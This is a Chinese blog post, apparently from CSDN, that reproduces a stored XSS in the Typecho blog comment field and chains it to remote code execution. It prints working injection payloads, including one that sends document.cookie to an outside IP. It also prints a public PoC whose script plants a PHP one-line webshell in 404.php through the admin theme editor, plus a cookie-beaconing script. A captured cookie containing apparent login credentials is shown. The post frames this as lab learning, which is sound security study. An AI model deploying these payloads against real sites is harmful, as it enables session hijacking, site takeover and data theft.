typecho存储型xss漏洞复现

已于 2023-07-26 15:11:14 修改
阅读量345 收藏
点赞数 2
文章标签: xss 前端 笔记 经验分享
于 2023-07-26 15:09:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73299839/article/details/131939670
版权

目录

前言

本文仅用作网络安全学习,实验所用一切环境皆为自身搭建,涉及脚本禁止用于恶意渗透,遵守纪律从你我做起

之前搭博客的时候使用的是typecho,然后有看到文章说typecho<=1.2.0 评论区爆出xss漏洞,就想着去复现下这个漏洞

先搭建一个安装有typecho的环境

在服务器上安装好typecho,然后打开一篇文章
测试文章

触发漏洞

在填网站的位置输入一个测试代码

http://a.b/"></a><script>alert('hack')</script><a/href="#

添加恶意代码
可以看到,在前台就直接出现弹窗了
前台出现弹窗
再访问数据库查看,可以看到,恶意代码已经被插入其中
数据库查看
以上可看出这是一个存储型xss漏洞

模拟攻击者操作

自己尝试进行利用。。。(结果失败了😂)

进行简单利用一下

尝试窃取用户的cookie

http://a.b/"></a><script>alert('cookie:'+document.cookie)</script><a/href="#

填写评论
然后不出所料,弹窗上显示了cookie
cookie
模拟被攻击者访问这个文章,出现了当前用户的cookie:

Cookie: __gsas=ID=4d7d759b4c82f636:T=1690014531:RT=1690014531:S=ALNI_MYgnsmVQ1jTFEbw4Djp-PxASzpxEA; __typecho_lang=zh_CN; __typecho_config=YTo3OntzOjY6InByZWZpeCI7czo4OiJ0eXBlY2hvXyI7czo4OiJ1c2VyTmFtZSI7czo0OiJyb290IjtzOjEyOiJ1c2VyUGFzc3dvcmQiO3M6OToiSm9rZXIxNDEyIjtzOjg6InVzZXJNYWlsIjtzOjI0OiJ3ZWJtYXN0ZXJAeW91cmRvbWFpbi5jb20iO3M6NzoiYWRhcHRlciI7czoxMDoiUGRvX1NRTGl0ZSI7czo3OiJzaXRlVXJsIjtzOjE4OiJodHRwczovL2xhbjFvYy5sb2wiO3M6NDoiZmlsZSI7czo2ODoiL2hvbWUvdTQ3Mjg5NTMwOS9kb21haW5zL2xhbjFvYy5sb2wvcHVibGljX2h0bWwvdXNyLzY0YmI5ZTIxMjA4ZmQuZGIiO30%3D; _ga=GA1.2.136013342.1690022226; _gid=GA1.2.704794256.1690022226; _ga_9Q6H0QETRF=GS1.2.1690022226.1.1.1690023947.60.0.0; dbd467a22454ae05c4bdfd8f479b9d02__typecho_uid=1; dbd467a22454ae05c4bdfd8f479b9d02__typecho_authCode=%24T%24GtpcSbG85bbd0333bec3cda4b921d84b713afad29; PHPSESSID=8oef9oi00fkg177efo2r29knke

cookie
被攻击者的cookie
但是这种以弹窗方式获取cookie无法利用,因为弹窗上显示的cookie只有用户本身能看到,攻击者无法直接获得,可以通过远程接收来获得

攻击者服务器搭建

过程放笔记里了

接收cookie

更改恶意代码然后注入到数据库

http://a.b/"></a><script>fetch('http://192.168.152.133:8000/getcookie.php?cookie='+document.cookie)</script><a/href="#

恶意代码
然后模拟被攻击者访问这篇文章,再去看看cookie是否被获取
用命令进入容器进行交互

docker exec -it 61f2815db25c bash

结果并没有cookie写入,经过一番尝试,后来也用vps试了下也没成功,应该失败不只是这个容器不处于公网的原因,还因为浏览器有自身的安全策略,然后应该是被这些策略阻断了

公开的poc

介绍

根据poc,能获取cookie,并且在404.php中写入一句话shell
运用到以下两个脚本

jQuery.js

function step1(){
    var data2="<iframe id=\"testxss\" src=\"https://www.lan1oc.lol/admin/theme-editor.php?theme=default&file=404.php\" width=\"0%\" height=\"0%\" onload=\"poc()\"></iframe>";
    var oldata=document.body.innerHTML;
    document.body.innerHTML=(oldata+data2);}
var times=0;
var g_shell=0;
function poc(){
    if(times<=10){
        var htmldata=document.getElementById('testxss').contentWindow.document.getElementById('content');
        var btn=document.getElementById('testxss').contentWindow.document.getElementsByTagName('button');
        htmldata.innerText=('<?php eval($_POST[1]);');
        btn[1].click();
        times+=1;
        if(g_shell==1){
            var xhr1=new XMLHttpRequest();
            xhr1.open('get','/usr/themes/default/404.php?shell=1');
            xhr1.send();
            }
        else{
            return 0;
        }
    }
}
step1();

cookie.js

var website = "http://192.168.152.133:8000";

(function() {
  // 创建一个新的 Image 对象
  var img = new Image();

  // 构造请求 URL,其中包含了当前页面的信息和用户的 Cookie
  var requestURL =
    website +
    '/?keepsession=1&location=' +
    escape(function() {
      try {
        return document.location.href;
      } catch (e) {
        return '';
      }
    }()) +
    '&toplocation=' +
    escape(function() {
      try {
        return top.location.href;
      } catch (e) {
        return '';
      }
    }()) +
    '&cookie=' +
    escape(function() {
      try {
        return document.cookie;
      } catch (e) {
        return '';
      }
    }()) +
    '&opener=' +
    escape(function() {
      try {
        return (window.opener && window.opener.location.href) ? window.opener.location.href : '';
      } catch (e) {
        return '';
      }
    }());

  // 设置 Image 对象的 src 属性为请求 URL,从而发送请求
  img.src = requestURL;
})();

keepsession、location两参数可自行更改,并且需要编写一个接收请求的文件来处理这些参数

具体流程

这里我要做了rce的复现,在评论区植入恶意代码

http://xxx.xxx.com/"></a><script/src=https://lan1oc.co/js/jQuery.js></script><a/href="#

然后管理员要在后台进行评论审核时就会达成执行脚本的条件,jQuery.js执行后,会修改404.php模板文件,写入一句话木马

<?php eval($_POST[1]);

用户只需要访问/usr/themes/default/404.php,然后post传参就能rce
rce
并且能看到404.php的源码已被篡改
被篡改的404

结语

因为水平问题,复现过程进行的磕磕绊绊的,希望在往后的学习中能够逐渐提高😤

lan1oc
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
typecho主题模板,typecho后台模板
01-06
标题中的“typecho主题模板,typecho后台模板”指的是Typecho博客系统使用的界面设计和布局样式,即Typecho前端展示部分。Typecho是一个轻量级的开源博客平台,允许用户自定义主题来改变博客的外观和用户体验。...
Typecho博客收费主题,handsome 6.0
06-15
标题中的“Typecho博客收费主题,handsome 6.0”指的是一个专为Typecho博客平台设计的付费主题,版本号为6.0。Typecho是一款开源、轻量级的博客系统,它允许用户通过简单的界面创建和管理自己的博客。"handsome"是这...
记一次typecho反序列化漏洞复现(第一次写poc版)
m0_62100902的博客
06-28 1941
经过一系列的代码审计,终于找到一个可以利用的点,其余的属性全都是写死了的,也就是静态this的调用方式,而这里不是静态的,它可以是别的对象里面去调用这个属性,那么我们可以想到一种魔术方法:__get(),这个魔术方法是当对象中调用不存在的属性时候会自动去调用这个魔术方法,那么我们需要去找到一个既有__get()魔术方法的又没有screenName这个属性的对象(这里终于来点感觉了),继续在代码审计工具里面找__get()说一说我的个人理解吧。举个例子,php与java之间是如何相互传输的呢?
反序列化typecho2靶场漏洞-代码审计全过程(超详细)
qq_59020256的博客
01-28 1127
php· }
CVE-2020-13821漏洞复现
m0_68356693的博客
04-28 680
MQTT最大优点在于可以以极少的代码和有限的带宽,为远程连接设备提过实时可靠的消息服务,作为一种低开销、低带宽占用的即时通讯协议,使其在物联网、小设备、移动应用等方面有较广泛的应用。当其他用户访问受到XSS攻击的网页时,这些恶意脚本代码将在他们的浏览器上执行,从而导致攻击者能够窃取用户的会话信息、篡改网页内容、重定向用户到恶意网站等恶意行为。在发送给Broker的MQTT数据包中的一个精心构造的clientid参数在管理控制台的客户端部分中被反射。较高的版本不支持我们使用的回调 API 版本。
Typecho框架漏洞
weixin_62693307的博客
11-19 417
这里说的漏洞xss漏洞,学过渗透的应该都学过,我在这里就不过多阐述了,下面我们直接进入正题。然后再次访问时即可弹出一个框,这里学过xss漏洞的应该知道是什么意思了。这里说的框架漏洞只适用于1.2.0版本及以下的版本。然后等管理员访问评论是会使得js文件也给运行起来。然后这里就像上面反弹xss代码一样书写网址。生成的一句话目录路径可以自己改,上面的如下。在404.php中,这样路径的问题就解决了。这样我们就可以用蚁剑或其他工具连接后台了。
XSS漏洞原理与防护措施
qq_50905066的博客
03-27 9353
xss漏洞,既跨站脚本攻击 xss分类: 大致可以分为储存与反射。 储存:最直接的危害类,跨站代码存储在服务器(数据库)。 反射:反射跨站脚本漏洞,最普遍的类。用户访问服务器-跨站链接-返回跨站代码。 如图 图中所示位储存xss攻击流程。攻击者要先搭建起恶意服务器。构建xss恶意脚本,通过留言,评论,注册等各种正常服务器可以上传的位置上传恶意脚本。 服务器会将恶意脚本保存在数据库中,当正常用户访问服务器并查看了该恶意脚本时,服务器会将xss的恶意脚本返回至用户浏览器。 这时用
xss漏洞的修复建议/方法
热门推荐
小雨的博客
05-10 1万+
1. html encoding 跨站点脚本漏洞最有效的解决方案是对用户受影响输出进行 HTML encoding。 应用程序应该对:直接源自用户输入的值、可能受用户影响的值、受用户影响的数据存储库值(数据库、日志、文件等)或可能具有的任何其他信息的任何输出进行编码。 在将这些值包含在发送给用户的输出中之前,应通过数据清理组件(编码器)处理此信息,该组件替换其 HTML 表示中的非字母数字字符。此操作确保每个脚本都将呈现给用户,而不是在用户的浏览器中执行。 这些信息在传输中应该执行净化:替换掉
typecho-1.1-15.5.12-beta.zip
03-17
Typecho 1.1-15.5.12 Beta 版本中的反序列化漏洞详解》 在IT安全领域,程序的漏洞是开发者和安全专家关注的重点。本文将详细探讨“typecho-1.1-15.5.12-beta.zip”压缩包中的Typecho 1.1版本至15.5.12 Beta版本中...
Typecho文章知识付费阅读插件源码
08-31
作为Typecho插件,应保持与Typecho新版本的兼容性,及时更新以修复可能的安全漏洞和性能问题。 总结来说,"Typecho文章知识付费阅读插件源码"是一个全面的解决方案,它不仅提供了付费阅读功能,还通过积分商城和免...
Typecho主题情侣博客Brave主题源码
最新发布
06-07
Typecho是一款轻量级的开源博客系统,深受许多个人及情侣博主的喜爱。它以其简洁的界面、易用的后台管理以及强大的自定义能力而受到欢迎。"Brave主题"是专为Typecho设计的一款独特主题,尤其适合情侣博主使用,为...
typecho cms 利用工具
07-30
typecho cms漏洞利用工具可以直接getshell 功能强大使用方便
【Java代码审计】XSS漏洞产生原理及其修复
m0_62783065的博客
05-17 5063
【Java代码审计】XSS漏洞产生原理及其修复
Typecho1.2 - 1.2.1-rc前台评论存储xss到rce 漏洞复现-分析-修复
君逍遥o
09-08 239
Typecho1.2 - 1.2.1-rc前台评论存储xss到rce 漏洞复现-分析-修复
Appcms存储XSS漏洞复现
钟言的博客
03-10 4746
本篇为Appcms存储XSS漏洞复现,采用多次注入的方式完成我们的payload注入,详细内容包含了环境介绍环境部署测试回显四、多次注入 1、第一条评论 2、第二条评论 3、管理员登录查看五、编写脚本获取cookie等内容
XSS(Cross Site Scripting)跨站脚本攻击
Eason_LYC安全白帽子的成长博客
05-13 2825
XSS最为全面的知识点梳理总结,并有公开靶场配合知识点练习。含金量十成十
Typecho重大漏洞
qq_43676541的博客
04-15 338
#简介 Typecho是一个基于PHP的博客软件。Typecho是在GNU通用公共许可证2.0下发布的。 Typecho在1.1版本中存在反序列化漏洞,当系统未安装的情况下,攻击者可以利用ins
Typecho在使用的过程中常见问题汇总
大伟先生
05-23 619
typecho的实际应用的过程,遇到的常见问题汇总。
yxcms存储XSS至getshell 漏洞复现
Boom!脑洞大爆炸的博客
06-28 1923
yxcms存储XSS至getshell 漏洞复现
typecho 1.2.0
09-23
同时,Typecho 1.2.0增加了更多的安全措施,可防止SQL注入、XSS攻击等常见的安全威胁。 Typecho 1.2.0还新增了一些实用的特性。例如,博客主题设置和插件管理界面更加人性化,并且加入了对多种语言的支持。此外,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值